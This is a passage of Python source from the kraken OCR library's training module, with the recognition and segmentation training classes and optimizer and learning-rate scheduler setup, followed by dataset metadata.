f'{len(alpha_diff.union(alpha_diff_val))} new code points')\n # Add the characters in val only\n codec = codec.add_labels(alpha_diff.union(alpha_diff_val))\n self.nn.add_codec(codec)\n logger.info(f'Resizing last layer in network to {codec.max_label+1} outputs')\n self.nn.resize_output(codec.max_label + 1)\n self.train_set.dataset.encode(self.nn.codec)\n elif self.resize == 'both':\n logger.info(f'Resizing network or given codec to '\n f'{len(self.train_set.dataset.alphabet)+len(self.val_set.dataset.alphabet)} '\n f'code sequences')\n self.train_set.dataset.encode(None)\n ncodec, del_labels = codec.merge(self.train_set.dataset.codec)\n # Add the characters in val only\n val_diff = set(self.val_set.dataset.alphabet).difference(\n set(ncodec.c2l.keys())\n )\n ncodec.add_labels(val_diff)\n # Switch codec.\n self.nn.add_codec(ncodec)\n logger.info(f'Deleting {len(del_labels)} output classes from network '\n f'({len(codec)-len(del_labels)} retained)')\n self.train_set.dataset.encode(ncodec)\n self.nn.resize_output(ncodec.max_label + 1, del_labels)\n else:\n raise ValueError(f'invalid resize parameter value {self.resize}')\n\n self.nn.codec.strict = False\n\n else:\n self.train_set.dataset.encode(self.codec)\n logger.info(f'Creating new model {self.spec} with {self.train_set.dataset.codec.max_label+1} outputs')\n self.spec = '[{} O1c{}]'.format(self.spec[1:-1], self.train_set.dataset.codec.max_label + 1)\n self.nn = vgsl.TorchVGSLModel(self.spec)\n # initialize weights\n self.nn.init_weights()\n self.nn.add_codec(self.train_set.dataset.codec)\n\n self.val_set.dataset.encode(self.nn.codec)\n\n if self.nn.one_channel_mode and self.train_set.dataset.im_mode != self.nn.one_channel_mode:\n logger.warning(f'Neural network has been trained on mode {self.nn.one_channel_mode} images, '\n f'training set contains mode {self.train_set.dataset.im_mode} data. 
Consider setting `force_binarization`')\n\n if self.format_type != 'path' and self.nn.seg_type == 'bbox':\n logger.warning('Neural network has been trained on bounding box image information but training set is polygonal.')\n\n self.nn.hyper_params = self.hparams\n self.nn.model_type = 'recognition'\n\n if not self.nn.seg_type:\n logger.info(f'Setting seg_type to {self.train_set.dataset.seg_type}.')\n self.nn.seg_type = self.train_set.dataset.seg_type\n\n self.rec_nn = models.TorchSeqRecognizer(self.nn, train=None, device=None)\n self.net = self.nn.nn\n\n torch.set_num_threads(max(self.num_workers, 1))\n\n def train_dataloader(self):\n return DataLoader(self.train_set,\n batch_size=self.hparams.batch_size,\n num_workers=self.num_workers,\n pin_memory=True,\n shuffle=True,\n collate_fn=collate_sequences)\n\n def val_dataloader(self):\n return DataLoader(self.val_set,\n shuffle=False,\n batch_size=self.hparams.batch_size,\n num_workers=self.num_workers,\n pin_memory=True,\n collate_fn=collate_sequences)\n\n def configure_callbacks(self):\n callbacks = []\n if self.hparams.quit == 'early':\n callbacks.append(EarlyStopping(monitor='val_accuracy',\n mode='max',\n patience=self.hparams.lag,\n stopping_threshold=1.0))\n return callbacks\n\n # configuration of optimizers and learning rate schedulers\n # --------------------------------------------------------\n #\n # All schedulers are created internally with a frequency of step to enable\n # batch-wise learning rate warmup. In lr_scheduler_step() calls to the\n # scheduler are then only performed at the end of the epoch.\n def configure_optimizers(self):\n return _configure_optimizer_and_lr_scheduler(self.hparams,\n self.nn.nn.parameters(),\n len_train_set=len(self.train_set),\n loss_tracking_mode='max')\n\n def optimizer_step(self, epoch, batch_idx, optimizer, optimizer_idx,\n optimizer_closure, on_tpu=False, using_native_amp=False,\n using_lbfgs=False):\n # update params\n optimizer.step(closure=optimizer_closure)\n\n # linear warmup between 0 and the initial learning rate `lrate` in `warmup`\n # steps.\n if self.hparams.warmup and self.trainer.global_step < self.hparams.warmup:\n lr_scale = min(1.0, float(self.trainer.global_step + 1) / self.hparams.warmup)\n for pg in optimizer.param_groups:\n pg[\"lr\"] = lr_scale * self.hparams.lrate\n\n def lr_scheduler_step(self, scheduler, optimizer_idx, metric):\n if not self.hparams.warmup or self.trainer.global_step >= self.hparams.warmup:\n # step OneCycleLR each batch if not in warmup phase\n if isinstance(scheduler, lr_scheduler.OneCycleLR):\n scheduler.step()\n # step every other scheduler epoch-wise\n elif self.trainer.is_last_batch:\n scheduler.step()\n\n\nclass SegmentationModel(pl.LightningModule):\n def __init__(self,\n hyper_params: Dict = None,\n load_hyper_parameters: bool = False,\n progress_callback: Callable[[str, int], Callable[[None], None]] = lambda string, length: lambda: None,\n message: Callable[[str], None] = lambda *args, **kwargs: None,\n output: str = 'model',\n spec: str = default_specs.SEGMENTATION_SPEC,\n model: Optional[Union[pathlib.Path, str]] = None,\n training_data: Union[Sequence[Union[pathlib.Path, str]], Sequence[Dict[str, Any]]] = None,\n evaluation_data: Optional[Union[Sequence[Union[pathlib.Path, str]], Sequence[Dict[str, Any]]]] = None,\n partition: Optional[float] = 0.9,\n num_workers: int = 1,\n force_binarization: bool = False,\n format_type: str = 'path',\n suppress_regions: bool = False,\n suppress_baselines: bool = False,\n valid_regions: 
Optional[Sequence[str]] = None,\n valid_baselines: Optional[Sequence[str]] = None,\n merge_regions: Optional[Dict[str, str]] = None,\n merge_baselines: Optional[Dict[str, str]] = None,\n bounding_regions: Optional[Sequence[str]] = None,\n resize: str = 'fail',\n topline: Union[bool, None] = False):\n \"\"\"\n A LightningModule encapsulating the training setup for a page\n segmentation model.\n\n Setup parameters (load, training_data, evaluation_data, ....) are\n named, model hyperparameters (everything in\n `kraken.lib.default_specs.SEGMENTATION_HYPER_PARAMS`) are in the\n `hyper_params` argument.\n\n Args:\n hyper_params (dict): Hyperparameter dictionary containing all fields\n from\n kraken.lib.default_specs.SEGMENTATION_HYPER_PARAMS\n **kwargs: Setup parameters, i.e. CLI parameters of the segtrain() command.\n \"\"\"\n\n super().__init__()\n\n self.best_epoch = 0\n self.best_metric = 0.0\n\n self.model = model\n self.num_workers = num_workers\n self.resize = resize\n self.format_type = format_type\n self.output = output\n self.bounding_regions = bounding_regions\n self.topline = topline\n\n hyper_params_ = default_specs.SEGMENTATION_HYPER_PARAMS\n\n if model:\n logger.info(f'Loading existing model from {model}')\n self.nn = vgsl.TorchVGSLModel.load_model(model)\n\n if self.nn.model_type not in [None, 'segmentation']:\n raise ValueError(f'Model {model} is of type {self.nn.model_type} while `segmentation` is expected.')\n\n if load_hyper_parameters:\n hp = self.nn.hyper_params\n else:\n hp = {}\n hyper_params_.update(hp)\n batch, channels, height, width = self.nn.input\n else:\n self.nn = None\n\n spec = spec.strip()\n if spec[0] != '[' or spec[-1] != ']':\n raise ValueError(f'VGSL spec \"{spec}\" not bracketed')\n self.spec = spec\n blocks = spec[1:-1].split(' ')\n m = re.match(r'(\\d+),(\\d+),(\\d+),(\\d+)', blocks[0])\n if not m:\n raise ValueError(f'Invalid input spec {blocks[0]}')\n batch, height, width, channels = [int(x) for x in m.groups()]\n\n if hyper_params:\n hyper_params_.update(hyper_params)\n\n validate_hyper_parameters(hyper_params_)\n self.save_hyperparameters(hyper_params_)\n\n if not training_data:\n raise ValueError('No training data provided. 
Please add some.')\n\n transforms = ImageInputTransforms(batch, height, width, channels, 0, valid_norm=False, force_binarization=force_binarization)\n\n self.example_input_array = torch.Tensor(batch,\n channels,\n height if height else 400,\n width if width else 300)\n\n # set multiprocessing tensor sharing strategy\n if 'file_system' in torch.multiprocessing.get_all_sharing_strategies():\n logger.debug('Setting multiprocessing tensor sharing strategy to file_system')\n torch.multiprocessing.set_sharing_strategy('file_system')\n\n if not valid_regions:\n valid_regions = None\n if not valid_baselines:\n valid_baselines = None\n\n if suppress_regions:\n valid_regions = []\n merge_regions = None\n if suppress_baselines:\n valid_baselines = []\n merge_baselines = None\n\n train_set = BaselineSet(training_data,\n line_width=self.hparams.line_width,\n im_transforms=transforms,\n mode=format_type,\n augmentation=self.hparams.augment,\n valid_baselines=valid_baselines,\n merge_baselines=merge_baselines,\n valid_regions=valid_regions,\n merge_regions=merge_regions)\n\n if format_type is None:\n for page in training_data:\n train_set.add(**page)\n\n if evaluation_data:\n val_set = BaselineSet(evaluation_data,\n line_width=self.hparams.line_width,\n im_transforms=transforms,\n mode=format_type,\n augmentation=False,\n valid_baselines=valid_baselines,\n merge_baselines=merge_baselines,\n valid_regions=valid_regions,\n merge_regions=merge_regions)\n\n if format_type is None:\n for page in evaluation_data:\n val_set.add(**page)\n\n train_set = Subset(train_set, range(len(train_set)))\n val_set = Subset(val_set, range(len(val_set)))\n else:\n train_len = int(len(train_set)*partition)\n val_len = len(train_set) - train_len\n logger.info(f'No explicit validation data provided. Splitting off '\n f'{val_len} (of {len(train_set)}) samples to validation '\n 'set.')\n train_set, val_set = random_split(train_set, (train_len, val_len))\n\n if len(train_set) == 0:\n raise ValueError('No valid training data provided. Please add some.')\n\n if len(val_set) == 0:\n raise ValueError('No valid validation data provided. 
Please add some.')\n\n # overwrite class mapping in validation set\n val_set.dataset.num_classes = train_set.dataset.num_classes\n val_set.dataset.class_mapping = train_set.dataset.class_mapping\n\n self.train_set = train_set\n self.val_set = val_set\n\n def forward(self, x):\n return self.nn.nn(x)\n\n def training_step(self, batch, batch_idx):\n input, target = batch['image'], batch['target']\n output, _ = self.nn.nn(input)\n output = F.interpolate(output, size=(target.size(2), target.size(3)))\n loss = self.nn.criterion(output, target)\n return loss\n\n def validation_step(self, batch, batch_idx):\n x, y = batch['image'], batch['target']\n pred, _ = self.nn.nn(x)\n # scale target to output size\n y = F.interpolate(y, size=(pred.size(2), pred.size(3))).squeeze(0).bool()\n pred = pred.squeeze() > 0.3\n pred = pred.view(pred.size(0), -1)\n y = y.view(y.size(0), -1)\n\n return {'intersections': (y & pred).sum(dim=1, dtype=torch.double),\n 'unions': (y | pred).sum(dim=1, dtype=torch.double),\n 'corrects': torch.eq(y, pred).sum(dim=1, dtype=torch.double),\n 'cls_cnt': y.sum(dim=1, dtype=torch.double),\n 'all_n': torch.tensor(y.size(1), dtype=torch.double, device=self.device)}\n\n def validation_epoch_end(self, outputs):\n smooth = torch.finfo(torch.float).eps\n\n intersections = torch.stack([x['intersections'] for x in outputs]).sum()\n unions = torch.stack([x['unions'] for x in outputs]).sum()\n corrects = torch.stack([x['corrects'] for x in outputs]).sum()\n cls_cnt = torch.stack([x['cls_cnt'] for x in outputs]).sum()\n all_n = torch.stack([x['all_n'] for x in outputs]).sum()\n\n # all_positives = tp + fp\n # actual_positives = tp + fn\n # true_positives = tp\n pixel_accuracy = corrects.sum() / all_n.sum()\n mean_accuracy = torch.mean(corrects / all_n)\n iu = (intersections + smooth) / (unions + smooth)\n mean_iu = torch.mean(iu)\n freq_iu = torch.sum(cls_cnt / cls_cnt.sum() * iu)\n\n if mean_iu > self.best_metric:\n logger.debug(f'Updating best metric from {self.best_metric} ({self.best_epoch}) to {mean_iu} ({self.current_epoch})')\n self.best_epoch = self.current_epoch\n self.best_metric = mean_iu\n\n logger.info(f'validation run: accuracy {pixel_accuracy} mean_acc {mean_accuracy} mean_iu {mean_iu} freq_iu {freq_iu}')\n self.log_dict({'val_accuracy': pixel_accuracy,\n 'val_mean_acc': mean_accuracy,\n 'val_mean_iu': mean_iu,\n 'val_freq_iu': freq_iu,\n 'val_metric': mean_iu}, prog_bar=True)\n\n def setup(self, stage: Optional[str] = None):\n # finalize models in case of appending/loading\n if stage in [None, 'fit']:\n if not self.model:\n self.spec = f'[{self.spec[1:-1]} O2l{self.train_set.dataset.num_classes}]'\n logger.info(f'Creating model {self.spec} with {self.train_set.dataset.num_classes} outputs')\n nn = vgsl.TorchVGSLModel(self.spec)\n if self.bounding_regions is not None:\n nn.user_metadata['bounding_regions'] = self.bounding_regions\n nn.user_metadata['topline'] = self.topline\n self.nn = nn\n else:\n if self.train_set.dataset.class_mapping['baselines'].keys() != self.nn.user_metadata['class_mapping']['baselines'].keys() or \\\n self.train_set.dataset.class_mapping['regions'].keys() != self.nn.user_metadata['class_mapping']['regions'].keys():\n\n bl_diff = set(self.train_set.dataset.class_mapping['baselines'].keys()).symmetric_difference(\n set(self.nn.user_metadata['class_mapping']['baselines'].keys()))\n regions_diff = set(self.train_set.dataset.class_mapping['regions'].keys()).symmetric_difference(\n 
set(self.nn.user_metadata['class_mapping']['regions'].keys()))\n\n if self.resize == 'fail':\n raise ValueError(f'Training data and model class mapping differ (bl: {bl_diff}, regions: {regions_diff})')\n elif self.resize == 'add':\n new_bls = self.train_set.dataset.class_mapping['baselines'].keys() - self.nn.user_metadata['class_mapping']['baselines'].keys()\n new_regions = self.train_set.dataset.class_mapping['regions'].keys() - self.nn.user_metadata['class_mapping']['regions'].keys()\n cls_idx = max(max(self.nn.user_metadata['class_mapping']['baselines'].values()) if self.nn.user_metadata['class_mapping']['baselines'] else -1,\n max(self.nn.user_metadata['class_mapping']['regions'].values()) if self.nn.user_metadata['class_mapping']['regions'] else -1)\n logger.info(f'Adding {len(new_bls) + len(new_regions)} missing types to network output layer.')\n self.nn.resize_output(cls_idx + len(new_bls) + len(new_regions) + 1)\n for c in new_bls:\n cls_idx += 1\n self.nn.user_metadata['class_mapping']['baselines'][c] = cls_idx\n for c in new_regions:\n cls_idx += 1\n self.nn.user_metadata['class_mapping']['regions'][c] = cls_idx\n elif self.resize == 'both':\n logger.info('Fitting network exactly to training set.')\n new_bls = self.train_set.dataset.class_mapping['baselines'].keys() - self.nn.user_metadata['class_mapping']['baselines'].keys()\n new_regions = self.train_set.dataset.class_mapping['regions'].keys() - self.nn.user_metadata['class_mapping']['regions'].keys()\n del_bls = self.nn.user_metadata['class_mapping']['baselines'].keys() - self.train_set.dataset.class_mapping['baselines'].keys()\n del_regions = self.nn.user_metadata['class_mapping']['regions'].keys() - self.train_set.dataset.class_mapping['regions'].keys()\n\n logger.info(f'Adding {len(new_bls) + len(new_regions)} missing '\n f'types to and removing {len(del_bls) + len(del_regions)} from network output layer')\n cls_idx = max(max(self.nn.user_metadata['class_mapping']['baselines'].values()) if self.nn.user_metadata['class_mapping']['baselines'] else -1,\n max(self.nn.user_metadata['class_mapping']['regions'].values()) if self.nn.user_metadata['class_mapping']['regions'] else -1)\n\n del_indices = [self.nn.user_metadata['class_mapping']['baselines'][x] for x in del_bls]\n del_indices.extend(self.nn.user_metadata['class_mapping']['regions'][x] for x in del_regions)\n self.nn.resize_output(cls_idx + len(new_bls) + len(new_regions) -\n len(del_bls) - len(del_regions) + 1, del_indices)\n\n # delete old baseline/region types\n cls_idx = min(min(self.nn.user_metadata['class_mapping']['baselines'].values()) if self.nn.user_metadata['class_mapping']['baselines'] else np.inf,\n min(self.nn.user_metadata['class_mapping']['regions'].values()) if self.nn.user_metadata['class_mapping']['regions'] else np.inf)\n\n bls = {}\n for k, v in sorted(self.nn.user_metadata['class_mapping']['baselines'].items(), key=lambda item: item[1]):\n if k not in del_bls:\n bls[k] = cls_idx\n cls_idx += 1\n\n regions = {}\n for k, v in sorted(self.nn.user_metadata['class_mapping']['regions'].items(), key=lambda item: item[1]):\n if k not in del_regions:\n regions[k] = cls_idx\n cls_idx += 1\n\n self.nn.user_metadata['class_mapping']['baselines'] = bls\n self.nn.user_metadata['class_mapping']['regions'] = regions\n\n # add new baseline/region types\n cls_idx -= 1\n for c in new_bls:\n cls_idx += 1\n self.nn.user_metadata['class_mapping']['baselines'][c] = cls_idx\n for c in new_regions:\n cls_idx += 1\n self.nn.user_metadata['class_mapping']['regions'][c] = cls_idx\n 
else:\n raise ValueError(f'invalid resize parameter value {self.resize}')\n # backfill train_set/val_set mapping if key-equal as the actual\n # numbering in the train_set might be different\n self.train_set.dataset.class_mapping = self.nn.user_metadata['class_mapping']\n self.val_set.dataset.class_mapping = self.nn.user_metadata['class_mapping']\n\n # updates model's hyper params with user-defined ones\n self.nn.hyper_params = self.hparams\n\n # change topline/baseline switch\n loc = {None: 'centerline',\n True: 'topline',\n False: 'baseline'}\n\n if 'topline' not in self.nn.user_metadata:\n logger.warning(f'Setting baseline location to {loc[self.topline]} from unset model.')\n elif self.nn.user_metadata['topline'] != self.topline:\n from_loc = loc[self.nn.user_metadata['topline']]\n logger.warning(f'Changing baseline location from {from_loc} to {loc[self.topline]}.')\n self.nn.user_metadata['topline'] = self.topline\n\n logger.info('Training line types:')\n for k, v in self.train_set.dataset.class_mapping['baselines'].items():\n logger.info(f' {k}\\t{v}\\t{self.train_set.dataset.class_stats[\"baselines\"][k]}')\n logger.info('Training region types:')\n for k, v in self.train_set.dataset.class_mapping['regions'].items():\n logger.info(f' {k}\\t{v}\\t{self.train_set.dataset.class_stats[\"regions\"][k]}')\n\n if len(self.train_set) == 0:\n raise ValueError('No valid training data was provided to the train command. Please add valid XML data.')\n\n # set model type metadata field and dump class_mapping\n self.nn.model_type = 'segmentation'\n self.nn.user_metadata['class_mapping'] = self.val_set.dataset.class_mapping\n\n # for model size/trainable parameter output\n self.net = self.nn.nn\n\n torch.set_num_threads(max(self.num_workers, 1))\n\n def train_dataloader(self):\n return DataLoader(self.train_set,\n batch_size=1,\n num_workers=self.num_workers,\n shuffle=True,\n pin_memory=True)\n\n def val_dataloader(self):\n return DataLoader(self.val_set,\n shuffle=False,\n batch_size=1,\n num_workers=self.num_workers,\n pin_memory=True)\n\n def configure_callbacks(self):\n callbacks = []\n if self.hparams.quit == 'early':\n callbacks.append(EarlyStopping(monitor='val_mean_iu',\n mode='max',\n patience=self.hparams.lag,\n stopping_threshold=1.0))\n\n return callbacks\n\n # configuration of optimizers and learning rate schedulers\n # --------------------------------------------------------\n #\n # All schedulers are created internally with a frequency of step to enable\n # batch-wise learning rate warmup. 
In lr_scheduler_step() calls to the\n # scheduler are then only performed at the end of the epoch.\n def configure_optimizers(self):\n return _configure_optimizer_and_lr_scheduler(self.hparams,\n self.nn.nn.parameters(),\n len_train_set=len(self.train_set),\n loss_tracking_mode='max')\n\n def optimizer_step(self, epoch, batch_idx, optimizer, optimizer_idx,\n optimizer_closure, on_tpu=False, using_native_amp=False,\n using_lbfgs=False):\n # update params\n optimizer.step(closure=optimizer_closure)\n\n # linear warmup between 0 and the initial learning rate `lrate` in `warmup`\n # steps.\n if self.hparams.warmup and self.trainer.global_step < self.hparams.warmup:\n lr_scale = min(1.0, float(self.trainer.global_step + 1) / self.hparams.warmup)\n for pg in optimizer.param_groups:\n pg[\"lr\"] = lr_scale * self.hparams.lrate\n\n def lr_scheduler_step(self, scheduler, optimizer_idx, metric):\n if not self.hparams.warmup or self.trainer.global_step >= self.hparams.warmup:\n # step OneCycleLR each batch if not in warmup phase\n if isinstance(scheduler, lr_scheduler.OneCycleLR):\n scheduler.step()\n # step every other scheduler epoch-wise\n elif self.trainer.is_last_batch:\n scheduler.step()\n\n\ndef _configure_optimizer_and_lr_scheduler(hparams, params, len_train_set=None, loss_tracking_mode='max'):\n # XXX: Warmup is not configured here because it needs to be manually done in optimizer_step()\n logger.debug(f'Constructing {hparams.optimizer} optimizer (lr: {hparams.lrate}, momentum: {hparams.momentum})')\n if hparams.optimizer == 'Adam':\n optim = torch.optim.Adam(params, lr=hparams.lrate, weight_decay=hparams.weight_decay)\n else:\n optim = getattr(torch.optim, hparams.optimizer)(params,\n lr=hparams.lrate,\n momentum=hparams.momentum,\n weight_decay=hparams.weight_decay)\n lr_sched = {}\n if hparams.schedule == 'exponential':\n lr_sched = {'scheduler': lr_scheduler.ExponentialLR(optim, hparams.gamma, last_epoch=hparams.completed_epochs-1),\n 'interval': 'step'}\n elif hparams.schedule == 'cosine':\n lr_sched = {'scheduler': lr_scheduler.CosineAnnealingLR(optim, hparams.gamma, last_epoch=hparams.completed_epochs-1),\n 'interval': 'step'}\n elif hparams.schedule == 'step':\n lr_sched = {'scheduler': lr_scheduler.StepLR(optim, hparams.step_size, hparams.gamma, last_epoch=hparams.completed_epochs-1),\n 'interval': 'step'}\n elif hparams.schedule == 'reduceonplateau':\n lr_sched = {'scheduler': lr_scheduler.ReduceLROnPlateau(optim,\n mode=loss_tracking_mode,\n factor=hparams.rop_factor,\n patience=hparams.rop_patience),\n 'interval': 'step'}\n elif hparams.schedule == '1cycle':\n if hparams.epochs <= 0:\n raise ValueError('1cycle learning rate scheduler selected but '\n 'number of epochs is less than 0 '\n f'({hparams.epochs}).')\n last_epoch = hparams.completed_epochs*len_train_set if hparams.completed_epochs else -1\n lr_sched = {'scheduler': lr_scheduler.OneCycleLR(optim,\n max_lr=hparams.lrate,\n epochs=hparams.epochs,\n steps_per_epoch=len_train_set,\n last_epoch=last_epoch),\n 'interval': 'step'}\n elif hparams.schedule != 'constant':\n raise ValueError(f'Unsupported learning rate scheduler {hparams.schedule}.')\n\n if lr_sched:\n lr_sched['monitor'] = 'val_metric'\n\n return [optim], lr_sched if lr_sched else []\n", "sub_path": "kraken/lib/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 50671, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", "line_number": 47, 
"usage_type": "call"}, {"api_name": "kraken.lib.exceptions.KrakenInputException", "line_number": 55, "usage_type": "name"}, {"api_name": "pytorch_lightning.Trainer", "line_number": 60, "usage_type": "attribute"}, {"api_name": "typing.Sequence", "line_number": 66, "usage_type": "name"}, {"api_name": "kraken.lib.progress.KrakenTrainProgressBar", "line_number": 81, "usage_type": "call"}, {"api_name": "kraken.lib.progress", "line_number": 81, "usage_type": "name"}, {"api_name": "pytorch_lightning.callbacks.RichModelSummary", "line_number": 86, "usage_type": "call"}, {"api_name": "warnings.catch_warnings", "line_number": 94, "usage_type": "call"}, {"api_name": "warnings.filterwarnings", "line_number": 95, "usage_type": "call"}, {"api_name": "pytorch_lightning.callbacks.Callback", "line_number": 100, "usage_type": "name"}, {"api_name": "pytorch_lightning.callbacks.Callback", "line_number": 116, "usage_type": "name"}, {"api_name": "pytorch_lightning.LightningModule", "line_number": 131, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 133, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 133, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 136, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 137, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 137, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 137, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 138, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 139, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 139, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 139, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 139, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 139, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 140, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 140, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 140, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 140, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 140, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 140, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 141, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 148, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 148, "usage_type": "name"}, {"api_name": "kraken.lib.default_specs.RECOGNITION_SPEC", "line_number": 135, "usage_type": "attribute"}, {"api_name": "kraken.lib.default_specs", "line_number": 135, "usage_type": "name"}, {"api_name": "kraken.lib.default_specs.RECOGNITION_HYPER_PARAMS", "line_number": 166, "usage_type": "attribute"}, {"api_name": "kraken.lib.default_specs", "line_number": 166, "usage_type": "name"}, {"api_name": "kraken.lib.vgsl.TorchVGSLModel.load_model", "line_number": 169, "usage_type": "call"}, {"api_name": "kraken.lib.vgsl.TorchVGSLModel", "line_number": 169, "usage_type": "attribute"}, {"api_name": "kraken.lib.vgsl", "line_number": 169, "usage_type": "name"}, {"api_name": "kraken.lib.dataset.GroundTruthDataset", "line_number": 197, "usage_type": "name"}, {"api_name": "kraken.lib.xml.preparse_xml_data", "line_number": 201, "usage_type": "call"}, {"api_name": "kraken.lib.xml.preparse_xml_data", "line_number": 204, "usage_type": "call"}, {"api_name": "kraken.lib.dataset.PolygonGTDataset", 
"line_number": 208, "usage_type": "name"}, {"api_name": "kraken.lib.dataset.ArrowIPCRecognitionDataset", "line_number": 211, "usage_type": "name"}, {"api_name": "kraken.lib.dataset.PolygonGTDataset", "line_number": 238, "usage_type": "name"}, {"api_name": "re.match", "line_number": 260, "usage_type": "call"}, {"api_name": "kraken.lib.dataset.ImageInputTransforms", "line_number": 267, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 275, "usage_type": "call"}, {"api_name": "torch.multiprocessing.get_all_sharing_strategies", "line_number": 280, "usage_type": "call"}, {"api_name": "torch.multiprocessing", "line_number": 280, "usage_type": "attribute"}, {"api_name": "torch.multiprocessing.set_sharing_strategy", "line_number": 282, "usage_type": "call"}, {"api_name": "torch.multiprocessing", "line_number": 282, "usage_type": "attribute"}, {"api_name": "torch.utils.data.Subset", "line_number": 286, "usage_type": "call"}, {"api_name": "torch.utils.data.Subset", "line_number": 288, "usage_type": "call"}, {"api_name": "torch.utils.data.Subset", "line_number": 291, "usage_type": "call"}, {"api_name": "torch.utils.data.Subset", "line_number": 293, "usage_type": "call"}, {"api_name": "torch.utils.data.random_split", "line_number": 302, "usage_type": "call"}, {"api_name": "kraken.lib.util.make_printable", "line_number": 321, "usage_type": "call"}, {"api_name": "kraken.lib.codec.PytorchCodec", "line_number": 328, "usage_type": "call"}, {"api_name": "kraken.lib.util.make_printable", "line_number": 330, "usage_type": "call"}, {"api_name": "torch.multiprocessing.Pool", "line_number": 351, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 352, "usage_type": "call"}, {"api_name": "kraken.lib.exceptions.KrakenInputException", "line_number": 360, "usage_type": "name"}, {"api_name": "kraken.lib.exceptions.KrakenInputException", "line_number": 386, "usage_type": "call"}, {"api_name": "kraken.lib.dataset.compute_error", "line_number": 396, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 397, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 398, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 402, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 403, "usage_type": "call"}, {"api_name": "torch.finfo", "line_number": 404, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 404, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 412, "usage_type": "name"}, {"api_name": "kraken.lib.exceptions.KrakenEncodeException", "line_number": 433, "usage_type": "name"}, {"api_name": "kraken.lib.exceptions.KrakenInputException", "line_number": 441, "usage_type": "call"}, {"api_name": "kraken.lib.vgsl.TorchVGSLModel", "line_number": 477, "usage_type": "call"}, {"api_name": "kraken.lib.vgsl", "line_number": 477, "usage_type": "name"}, {"api_name": "kraken.lib.models.TorchSeqRecognizer", "line_number": 498, "usage_type": "call"}, {"api_name": "kraken.lib.models", "line_number": 498, "usage_type": "name"}, {"api_name": "torch.set_num_threads", "line_number": 501, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 504, "usage_type": "call"}, {"api_name": "kraken.lib.dataset.collate_sequences", "line_number": 509, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 512, "usage_type": "call"}, {"api_name": "kraken.lib.dataset.collate_sequences", "line_number": 517, "usage_type": "name"}, {"api_name": 
"pytorch_lightning.callbacks.EarlyStopping", "line_number": 522, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler.OneCycleLR", "line_number": 556, "usage_type": "attribute"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 556, "usage_type": "name"}, {"api_name": "pytorch_lightning.LightningModule", "line_number": 563, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 565, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 567, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 568, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 571, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 571, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 571, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 572, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 572, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 572, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 572, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 572, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 573, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 573, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 573, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 573, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 573, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 573, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 574, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 580, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 580, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 581, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 581, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 582, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 582, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 583, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 583, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 584, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 584, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 586, "usage_type": "name"}, {"api_name": "kraken.lib.default_specs.SEGMENTATION_SPEC", "line_number": 570, "usage_type": "attribute"}, {"api_name": "kraken.lib.default_specs", "line_number": 570, "usage_type": "name"}, {"api_name": 